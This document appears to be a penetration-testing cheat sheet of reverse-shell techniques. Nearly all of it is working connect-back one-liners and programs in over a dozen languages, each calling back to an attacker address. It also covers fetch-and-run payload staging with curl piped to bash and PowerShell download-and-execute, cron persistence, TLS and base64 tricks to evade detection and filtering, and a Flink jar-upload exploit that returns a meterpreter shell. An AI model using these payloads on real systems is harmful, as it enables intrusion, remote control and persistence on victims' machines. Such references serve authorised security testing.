Reverse shell methods
There are two kinds of shell: a forward (bind) shell and a reverse shell. Taking the client as the attacker and the server as the victim: forward shell: the victim listens on a port and the attacker connects to it directly. Reverse shell: the attacker listens and the victim connects back to the attacker (the connection is initiated from the server side, which is why it gets through inbound firewall rules and NAT that would block a bind shell).
Forward (bind) shell
On the target (here simulated in a terminal on the same Kali box), bind a shell to a port (e.g. 12345):
nc -lvp 12345 -e /bin/bash
From a second terminal connect to the target (192.168.100.100 is the server):
nc 192.168.100.100 12345
Note: -e only exists in netcat builds that support it (nc.traditional, ncat). OpenBSD nc has no -e; use the mkfifo constructions listed under "nc reverse shell" below.
Reverse shell
On the client (attacker) start the listener:
nc -lvp 12345
On the server (victim) run the connect-back command (192.168.100.101 is the attacker):
nc 192.168.100.101 12345 -e /bin/sh
A note first on getting a fully interactive shell with python
The shell you get from a reverse connection is usually not a real TTY (no job control, no tab completion, Ctrl-C kills the connection), so upgrade it with python's pty module:
python -c "import pty;pty.spawn('/bin/bash')"
Then press Ctrl-Z, run `stty raw -echo; fg` in the attacker's terminal and `export TERM=xterm` in the shell to get a fully working terminal.
Python 2.7 reverse shell (the same line runs unchanged on python3)
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.100.101",12345));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
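The dup2 trick in the python one-liner above, played out end to end on the loopback interface. This is an added example, not code from the original page: the attacker side listens and pushes commands like nc -lvp would, the victim side connects back and hands the socket to /bin/sh as fd 0/1/2. The loopback address, the OS-chosen port and the two sample commands are assumptions of the example; -i is left off so the captured output is deterministic.

```python
import socket
import subprocess
import threading


def attacker_listener(listener, commands):
    """Attacker side (the nc -lvp role): accept one connect-back, push the
    commands, then read everything the shell writes until it exits."""
    conn, _peer = listener.accept()
    with conn:
        for cmd in commands:
            conn.sendall((cmd + "\n").encode())
        conn.shutdown(socket.SHUT_WR)  # EOF on the shell's stdin makes it exit
        chunks = []
        while True:
            data = conn.recv(4096)
            if not data:
                break
            chunks.append(data)
    return b"".join(chunks).decode(errors="replace")


def victim_connect_back(host, port):
    """Victim side: connect out, then run /bin/sh with the socket as stdin,
    stdout and stderr. Popen dup2()s the socket fd onto 0/1/2 in the child,
    which is exactly what the os.dup2 calls in the one-liner do."""
    sock = socket.create_connection((host, port))
    subprocess.run(["/bin/sh"], stdin=sock, stdout=sock, stderr=sock, check=False)
    sock.close()  # the child had its own copies; closing ours ends the stream


def demo_reverse_shell(commands=("echo hello", "echo $((6*7))")):
    """Run both ends locally and return what the attacker received.
    Port 0 lets the OS pick a free port (a demo assumption; a real listener
    uses a fixed port such as 12345)."""
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.bind(("127.0.0.1", 0))
    listener.listen(1)
    port = listener.getsockname()[1]

    received = {}
    t = threading.Thread(
        target=lambda: received.update(out=attacker_listener(listener, list(commands)))
    )
    t.start()
    victim_connect_back("127.0.0.1", port)
    t.join(timeout=10)
    listener.close()
    return received.get("out", "")


if __name__ == "__main__":
    print(demo_reverse_shell(), end="")
```

Because the shell's stdin is the socket, closing the attacker's write side is what terminates the shell; in a real session that is the moment you type exit.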
Bash reverse shell
bash -i >& /dev/tcp/192.168.100.101/12345 0>&1
Recommended: base64-encode the whole command and decode it on the target (base64 -d), so the redirection characters survive quoting and input filtering. /dev/tcp and >& are bash features, so the line has to be run by bash, not sh.
PHP reverse shell
php -r '$sock=fsockopen("192.168.100.101",12345);exec("/bin/sh -i <&3 >&3 2>&3");'
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.100.101/12345 0>&1'");?>
The fsockopen variants assume the socket is file descriptor 3 (the first descriptor the php process opens); if another fd is already in use, change the number or use the proc_open form, which passes the socket explicitly. Any of the command execution functions works, so pick one that is not listed in disable_functions:
>php -r '$sock=fsockopen("192.168.100.101",12345);shell_exec("/bin/sh -i <&3 >&3 2>&3");'
>php -r '$sock=fsockopen("192.168.100.101",12345);`/bin/sh -i <&3 >&3 2>&3`;'
>php -r '$sock=fsockopen("192.168.100.101",12345);system("/bin/sh -i <&3 >&3 2>&3");'
>php -r '$sock=fsockopen("192.168.100.101",12345);passthru("/bin/sh -i <&3 >&3 2>&3");'
>php -r '$sock=fsockopen("192.168.100.101",12345);popen("/bin/sh -i <&3 >&3 2>&3", "r");'
>php -r '$sock=fsockopen("192.168.100.101",12345);$proc=proc_open("/bin/sh -i", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes);'
Perl reverse shell
perl -e 'use Socket;$i="192.168.100.101";$p=12345;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
Staged perl reverse shell (download first, then connect back)
Bash command that generates the download script d.pl (http://0.0.0.0/r.txt stands for wherever r.txt is hosted):
echo use LWP::Simple\;\$url=\"http://0.0.0.0/r.txt\"\;\$coont=get\(\$url\)\;die \"not found link..\" if\(\!defined\(\$coont\)\)\;open \$file,\"\>r.pl\" or die \"couldn\'t open t.txt ..\\n\"\;print \$file \$coont\;close\(\$file\)\;exit\;>d.pl
Running d.pl fetches r.txt and saves it as r.pl. r.pl, the connect-back script (0.0.0.:8080 is the placeholder for the attacker's host:port), is:
use IO::Socket::INET;$p=fork;exit,if($p);foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(PeerAddr,"0.0.0.:8080");STDIN->fdopen($c,r);$~->fdopen($c,w);while(<>){if($_=~/(.*)/){system $1;}};
The fork detaches the shell from the process that started it; the %ENV loop and the /(.*)/ capture before system untaint the environment and the command, so the script also runs under perl -T.
Forking variant (detaches from the parent):
>perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"192.168.100.101:12345");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
Windows (no fork):
>perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"192.168.100.101:12345");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
AWK reverse shell (needs gawk, which provides the /inet/ special files)
awk 'BEGIN{s="/inet/tcp/0/192.168.100.101/12345";for(;s|&getline c;close(c))while(c|getline)print|&s;close(s)}'
nc reverse shell
Without -e (works with any nc, including OpenBSD nc and BusyBox):
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.100.101 12345 >/tmp/f
With -e or -c (nc.traditional, ncat):
>nc -e /bin/sh 192.168.100.101 12345
>nc -e /bin/bash 192.168.100.101 12345
>nc -c bash 192.168.100.101 12345
Windows bind shell with nc.exe (-L keeps listening after a client disconnects):
>nc -Lp 12345 -vv -e cmd.exe
Named-pipe variant with mknod:
>mknod backpipe p; nc 192.168.100.101 12345 0<backpipe | /bin/bash 1>backpipe
A bare `nc 192.168.100.101 12345` without -e only opens a raw TCP connection; it has to be wired to a shell with one of the pipe constructions above.
OpenBSD nc
>rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.100.101 12345 >/tmp/f
BusyBox (mknod instead of mkfifo)
>rm -f /tmp/f;mknod /tmp/f p;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.100.101 12345 >/tmp/f
telnet reverse shell (the listener is on the attacker's port 443 here)
mknod backpipe p; telnet 192.168.100.101 443 0<backpipe | /bin/bash 1>backpipe
Ruby reverse shell
>ruby -rsocket -e'f=TCPSocket.open("192.168.100.101",12345).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
Forking variant that runs each line itself and handles cd (no /bin/sh needed):
>ruby -rsocket -e'exit if fork;c=TCPSocket.new("192.168.100.101","12345");loop{c.gets.chomp!;(exit! if $_=="exit");($_=~/cd (.+)/i?(Dir.chdir($1)):(IO.popen($_,?r){|io|c.print io.read}))rescue c.puts "failed: #{$_}"}'
Windows
>ruby -rsocket -e 'c=TCPSocket.new("192.168.100.101","12345");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
curl reverse shell
Contents of 1.html, served from the attacker's web server:
/bin/bash -i >& /dev/tcp/192.168.100.101/12345 0>&1
Run on the target:
>curl attackerip/1.html|bash
crontab reverse shell (this is the /etc/crontab or /etc/cron.d format with the extra user field; a user crontab omits "root")
* * * * * root bash -i >& /dev/tcp/192.168.100.101/12345 0>&1
Caveat: cron runs the line with /bin/sh unless SHELL=/bin/bash is set in the crontab, and dash rejects `>& file`; either set SHELL=/bin/bash in the file or wrap the command as bash -c '...'.
socat reverse shell (gives a full PTY, so no python upgrade is needed; listener and connect-back port must match)
Attacker> socat file:`tty`,raw,echo=0 TCP-L:12345
Target> /tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:192.168.100.101:12345
If socat is not installed on the target, fetch a static binary first:
Target> wget -q https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat -O /tmp/socat; chmod +x /tmp/socat; /tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:192.168.100.101:12345
Golang reverse shell (needs the go toolchain on the target)
echo 'package main;import"os/exec";import"net";func main(){c,_:=net.Dial("tcp","192.168.100.101:12345");cmd:=exec.Command("/bin/sh");cmd.Stdin=c;cmd.Stdout=c;cmd.Stderr=c;cmd.Run()}' > /tmp/t.go && go run /tmp/t.go && rm /tmp/t.go
Lua reverse shell (needs the LuaSocket library)
Linux (assumes the socket is fd 3, as in the php variant)
>lua -e "require('socket');require('os');t=socket.tcp();t:connect('192.168.100.101','12345');os.execute('/bin/sh -i <&3 >&3 2>&3');"
Windows (reads a line at a time and runs it through io.popen)
>lua5.1 -e 'local host, port = "192.168.100.101", 12345 local socket = require("socket") local tcp = socket.tcp() local io = require("io") tcp:connect(host, port); while true do local cmd, status, partial = tcp:receive() local f = io.popen(cmd, "r") local s = f:read("*a") f:close() tcp:send(s) if status == "closed" then break end end tcp:close()'
NodeJS reverse shell
(function(){
    var net = require("net"),
        cp = require("child_process"),
        sh = cp.spawn("/bin/sh", []);
    var client = new net.Socket();
    client.connect(12345, "192.168.100.101", function(){
        client.pipe(sh.stdin);
        sh.stdout.pipe(client);
        sh.stderr.pipe(client);
    });
    return /a/; // Prevents the Node.js application from crashing
})();
or
require('child_process').exec('nc -e /bin/sh 192.168.100.101 12345')
or (when require is not in scope, e.g. inside a sandboxed eval)
var x = global.process.mainModule.require
x('child_process').exec('nc 192.168.100.101 12345 -e /bin/bash')
or
https://gitlab.com/0x4ndr3/blog/blob/master/JSgen/JSgen.py
Java reverse shell
Runtime r = Runtime.getRuntime();
Process p = r.exec("/bin/bash -c 'exec 5<>/dev/tcp/192.168.100.101/12345;cat <&5 | while read line; do $line 2>&5 >&5; done'");
p.waitFor();
Windows (pure Java, no bash; needs java.net.Socket and java.io.InputStream/OutputStream; host is the attacker's address):
String host="127.0.0.1";
int port=12345;
String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();
Socket s=new Socket(host,port);
InputStream pi=p.getInputStream(),pe=p.getErrorStream(),si=s.getInputStream();
OutputStream po=p.getOutputStream(),so=s.getOutputStream();
while(!s.isClosed()){
    // pump process output to the socket and socket input to the process
    while(pi.available()>0)so.write(pi.read());
    while(pe.available()>0)so.write(pe.read());
    while(si.available()>0)po.write(si.read());
    so.flush();po.flush();Thread.sleep(50);
    try{p.exitValue();break;}catch(Exception e){}
}
p.destroy();s.close();
To keep a running application alive, run the shell in its own thread:
Thread thread = new Thread(){
    public void run(){
        // Reverse shell here
    }
};
thread.start();
C reverse shell
Compile and run (the listener is 10.0.0.1:4242 in this sample; adjust port and inet_addr):
>gcc /tmp/shell.c -o /tmp/csh && /tmp/csh
#include <stdio.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <stdlib.h>
#include <unistd.h>
#include <netinet/in.h>
#include <arpa/inet.h>

int main(void){
    int port = 4242;
    struct sockaddr_in revsockaddr;

    int sockt = socket(AF_INET, SOCK_STREAM, 0);
    revsockaddr.sin_family = AF_INET;
    revsockaddr.sin_port = htons(port);
    revsockaddr.sin_addr.s_addr = inet_addr("10.0.0.1");

    connect(sockt, (struct sockaddr *) &revsockaddr, sizeof(revsockaddr));
    /* the socket becomes stdin, stdout and stderr of the shell */
    dup2(sockt, 0);
    dup2(sockt, 1);
    dup2(sockt, 2);

    char * const argv[] = {"/bin/sh", NULL};
    execve("/bin/sh", argv, NULL);
    return 0;
}
Dart reverse shell (Windows: spawns powershell.exe for each line received)
import 'dart:io';
import 'dart:convert';

main() {
    Socket.connect("10.0.0.1", 4242).then((socket) {
        socket.listen((data) {
            Process.start('powershell.exe', []).then((Process process) {
                process.stdin.writeln(new String.fromCharCodes(data).trim());
                process.stdout
                    .transform(utf8.decoder)
                    .listen((output) { socket.write(output); });
            });
        },
        onDone: () {
            socket.destroy();
        });
    });
}
HTTP reverse shell
Client (attacker)
# write the shell script and start an HTTP server to serve it
echo "bash -i >& /dev/tcp/192.168.100.101/12345 0>&1" > shell.sh
python2: python -m SimpleHTTPServer 80
python3: python -m http.server 80
Server (target)
# download shell.sh from the attacker's HTTP server
wget 192.168.100.101/shell.sh
# run it with bash (not sh: >& and /dev/tcp are bash features)
bash shell.sh
whois
# not a shell: sends the output of one command (here whoami) to a listener on the attacker's port 7777
whois -h 192.168.100.101 -p 7777 `whoami`
openssl reverse shell (encrypted, so plaintext IDS signatures do not match; listener and connect-back port must be the same)
# listener side: self-signed certificate, then a TLS server
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
openssl s_server -quiet -key key.pem -cert cert.pem -port 12345
# or
ncat --ssl -vv -l -p 12345
# controlled side
mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect 192.168.100.101:12345 > /tmp/s; rm /tmp/s
powercat reverse shell
Project: https://github.com/besimorhino/powercat
Run in PowerShell on the target (the listener is nc -lvp 12345 on the attacker):
IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1');powercat -c 192.168.100.101 -p 12345 -e cmd
nishang reverse shell
Nishang is a PowerShell-based attack framework that bundles PowerShell attack scripts and payloads; it can return TCP, UDP, HTTP, HTTPS and ICMP shells.
Project: https://github.com/samratashok/nishang
# download nishang to the attacker's box and serve it over HTTP, then run the following in PowerShell on the target
IEX (New-Object Net.WebClient).DownloadString('http://192.168.100.101/nishang/Shells/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 192.168.100.101 -port 12345
Reverse UDP shell (the listener must be UDP, nc -u)
IEX (New-Object Net.WebClient).DownloadString('http://192.168.100.101/nishang/Shells/Invoke-PowerShellUdp.ps1');Invoke-PowerShellUdp -Reverse -IPAddress 192.168.100.101 -port 12345
MSF reverse shell
# list the one-liner reverse shell payloads and their paths
msfvenom -l payloads | grep 'cmd/windows/reverse'
# generate the reverse shell, then copy and paste it onto the target
msfvenom -p cmd/windows/reverse_powershell LHOST=192.168.100.101 LPORT=12345
Linux reverse shell tips
Find out which reverse-shell-capable commands exist on the target
Run on the server: whereis bash nc exec telnet python php perl ruby java go gcc g++
(whereis only finds binaries; exec is a shell builtin and never shows up. `command -v` or `which` gives the same answer one tool at a time.)
The goal is to know which interpreters are available before choosing a payload.
Also test that the target can reach your listener at all (egress filtering) before spending time on payloads.
Apache Flink unauthenticated jar upload leading to a reverse shell
Affected versions: flink <= 1.9.1 (as recorded here; the dashboard's jar upload has no authentication of its own)
Exploitation:
Generate the payload jar and start the msf handler (payload type and port must match the jar, otherwise the session is never caught):
msfvenom -p java/meterpreter/reverse_tcp LHOST=vpsip LPORT=12345 -f jar > flink.jar
use exploit/multi/handler
set payload java/meterpreter/reverse_tcp
set LHOST vpsip
set LPORT 12345
then run the handler.
Trigger:
Browse to ip:port/#/submit/submit
Upload flink.jar, click the uploaded jar, then Submit; the jar runs inside the JobManager and the shell comes back with the privileges of the user running Flink (root only if Flink itself runs as root).